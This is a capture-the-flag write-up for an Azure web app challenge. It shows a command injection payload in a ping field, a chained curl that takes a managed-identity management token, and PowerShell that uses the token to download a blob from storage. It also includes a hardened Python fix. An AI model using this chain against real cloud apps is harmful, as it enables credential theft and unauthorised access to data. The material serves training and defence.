# Managed Secrets

| Difficulty | Points | Solves |
| ---------- | ------ | ------ |
| Medium     | 500    | 3      |

## Description

> Today in school, I learnt how to create a website with Python! There is also the networking lesson where I learn the ping command...
>
> ps the flag is not in the instance :)
>
> [https://lncctf2023-webapp.azurewebsites.net](https://lncctf2023-webapp.azurewebsites.net/)
>
> \
> Hints: Are there any internal services/endpoints running by default?

Visiting the site shows an Azure Web App Service running.

{% embed url="<https://azure.microsoft.com/en-us/products/app-service/web>" %}

<figure><img src="/files/HEeE3Jhc15BoRmkfC3hA" alt=""><figcaption></figcaption></figure>

The web app sends a ping to whatever IP address or URL you give it. This is a classic command injection challenge, and code execution is easy to get:

```
8.8.8.8 & whoami
```

<figure><img src="/files/tF7Rk4pkFXNKupDHDVmf" alt=""><figcaption></figcaption></figure>
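The root cause, shown from the defender's side as an added example (not the challenge's source, which this page does not show): `vulnerable_ping` is an assumed shape of the handler, and `build_ping_argv` / `safe_ping` are hypothetical names for a hardened version that validates the target and never invokes a shell. The `ping` flags assume Linux iputils.

```python
import ipaddress
import re
import subprocess

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens.
_LABEL = r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
_HOSTNAME = re.compile(rf"{_LABEL}(\.{_LABEL})*\.?")


def vulnerable_ping(target: str) -> str:
    """Assumed 'before': user input is pasted into a shell command line,
    so '8.8.8.8 & whoami' runs ping and then whoami."""
    return subprocess.run(f"ping -c 1 {target}", shell=True,
                          capture_output=True, text=True).stdout


def build_ping_argv(target: str) -> list[str]:
    """Validate the target and return an argv list; raise ValueError otherwise."""
    target = target.strip()
    if "%" in target:                      # no IPv6 zone IDs from user input
        raise ValueError(f"rejected ping target: {target!r}")
    try:
        ipaddress.ip_address(target)       # accepts IPv4 and IPv6 literals
    except ValueError:
        # Not an IP literal: it must be a plain hostname and nothing else.
        if len(target) > 253 or not _HOSTNAME.fullmatch(target):
            raise ValueError(f"rejected ping target: {target!r}")
    # "--" ends option parsing, so the target can never be read as a flag.
    return ["ping", "-c", "1", "-W", "2", "--", target]


def safe_ping(target: str) -> str:
    """Hardened 'after': argv list, no shell, so '&', ';', '|' and '$'
    are never interpreted even if validation were bypassed."""
    argv = build_ping_argv(target)
    done = subprocess.run(argv, capture_output=True, text=True, timeout=5)
    return done.stdout
```

Fixing the handler closes the injection; scoping the web app's managed identity to only the resources it needs limits what a token obtained this way can reach.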

Since I now have code execution, I can get the app service to post to the IMDS to retrieve a management token, referring to HackTricks.

{% embed url="<https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#cea8>" %}

{% code overflow="wrap" %}

```
8.8.8.8 & curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
```

{% endcode %}

<figure><img src="/files/CFZm1Vqw84xV6hQ0qNMc" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```json
{
  "access_token": "<JWT access token>",
  "expires_on": "04/16/2023 22:34:06 +00:00",
  "resource": "https://management.azure.com/",
  "token_type": "Bearer",
  "client_id": "982d1ca9-81ee-450e-8953-0f1a27129eb2"
}
```

{% endcode %}

I am able to authenticate using the access token and client ID value.

{% code overflow="wrap" %}

```powershell
$token = "<JWT access token>"   # the access_token value from the response above
$id = "982d1ca9-81ee-450e-8953-0f1a27129eb2"

Connect-AzAccount -AccessToken $token -AccountId $id
```

{% endcode %}

<figure><img src="/files/EyB6qU3pMQPmiKPm1jgh" alt=""><figcaption></figcaption></figure>

Next, I enumerate the resources that this service principal has access to.

<figure><img src="/files/7mwJdwxK5VjsHF5ke6aP" alt=""><figcaption></figcaption></figure>

I am then able to retrieve the flag from the storage account.

{% code overflow="wrap" %}

```powershell
$rg="lncctf2023_managed_secrets"
$saname="lncctf2023managedsa"
$sa = Get-AzStorageAccount -ResourceGroupName $rg -StorageAccountName $saname
$ctx = $sa.Context

Get-AzStorageContainer -Context $ctx
Get-AzStorageBlob -Context $ctx -Container private
Get-AzStorageBlobContent -Blob flag.txt -Container private -Destination flag.txt -Context $ctx
```

{% endcode %}

<figure><img src="/files/ivS6bfj6mxVR40Poph31" alt=""><figcaption></figcaption></figure>

Flag: LNC2023{h3y\_h0w\_did\_y0u\_g3T\_thi5}


